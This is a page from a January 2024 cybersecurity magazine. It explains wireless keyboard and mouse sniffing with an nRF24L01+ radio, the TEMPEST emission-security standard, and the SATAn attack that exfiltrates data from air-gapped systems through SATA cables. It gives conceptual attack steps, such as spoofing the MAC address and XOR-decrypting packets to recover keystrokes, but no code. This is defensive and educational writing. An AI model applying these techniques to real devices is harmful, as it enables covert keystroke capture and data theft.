Page 184 - Cyber Defense eMagazine January 2024
P. 184
The Nordic Semiconductor nRF24L01+ can be used to promiscuously sniff radio frequency packets
transmitted between the wireless peripheral devices and the dongle connected to the computer. This
attack does not require any specially crafted hardware. Also, this can be used to reverse engineer
manufacturer proprietary protocols like Nike+ and study lower levels of ANT+ protocol.
In this exploit the sniffing of the radio packets is achieved by reducing the MAC address to 2 bytes by
disabling checksums, setting the MAC address to the same as the preamble, and forcing the dongle to
accept the noise as a valid MAC address (T. Goodspeed, 2011). The trick used here is to make a few
illegal register settings, disable the checksum, and generate background noise that is consumed as a
valid MAC address.
Once the MAC address is spoofed, the next step is to break the packet encryption. Usually, the packet
header is in cleartext and only the payload is XOR encrypted using the MAC address. Just by applying
XOR to the right regions, it is possible to decrypt the USB HID events and derive the key positions. Thus,
this technique can be successfully used to sniff keystrokes and mouse clicks promiscuously.
2.2 NATO Tempest
TEMPEST is a United States National Security Agency specification and a North Atlantic Treaty
Organization (NATO) certification. This specification refers to spying on information systems by listening
to electrical or radio signals, vibrations, sounds, and other leaking emanations. TEMPEST does cover
some methods that can be used to spy on wireless equipment like logging user keystrokes. It classifies
the emitted signals as sensitive because if these signals are sniffed and analyzed, they may disclose all
the data that is transmitted and processed by the wireless device. Along with covering details on how to
spy on other information systems, it also defines ways to prevent/protect devices from such spying. The
protection efforts are also known as emission security (EMSEC), which is a subset of communications
security (COMSEC). Prevention of spying can be achieved by shielding, masking, monitoring, filtering,
and defining the distance an attacker can get without being able to sniff the leaked signals. The standards
defined go from level A to C, with level A being the strictest for critical devices that operate in NATO zone
0.
2.3 SATAn: Air-Gap Exfiltration Attack
Air-gapped systems usually do not have any public internet connection and are used in critical
environments like industrial OT networks, government, military, nuclear plants, and other industrial
networks. They are isolated from other less secure networks that have access to the internet. It was
discovered that it is possible to exfiltrate data from air-gapped systems through Serial ATA (SATA) cables
that are in the form of wireless antennae inside the computers.
To perform this attack, the hacker must first gain physical access to the air-gapped system and install
the malware software. The software then prepares the sensitive data to be exfiltrated through modulation
and encoding. The SATA cables can deliver over a radio channel between 5.9995 and 5.9996 GHz
electromagnetic signals that correspond to specific characters (Mordechai Guri, 2022). Thus, this
malware can be used to hijack legitimate processes on air-gapped systems and emit radio signals during
specific read-and-write operations. In real real-world scenario, the receiver will be embedded in a piece
of hardware equipment placed close to the air-gapped system or realized as a process in a computer
Cyber Defense eMagazine – January 2024 Edition 184
Copyright © 2024, Cyber Defense Magazine. All rights reserved worldwide.
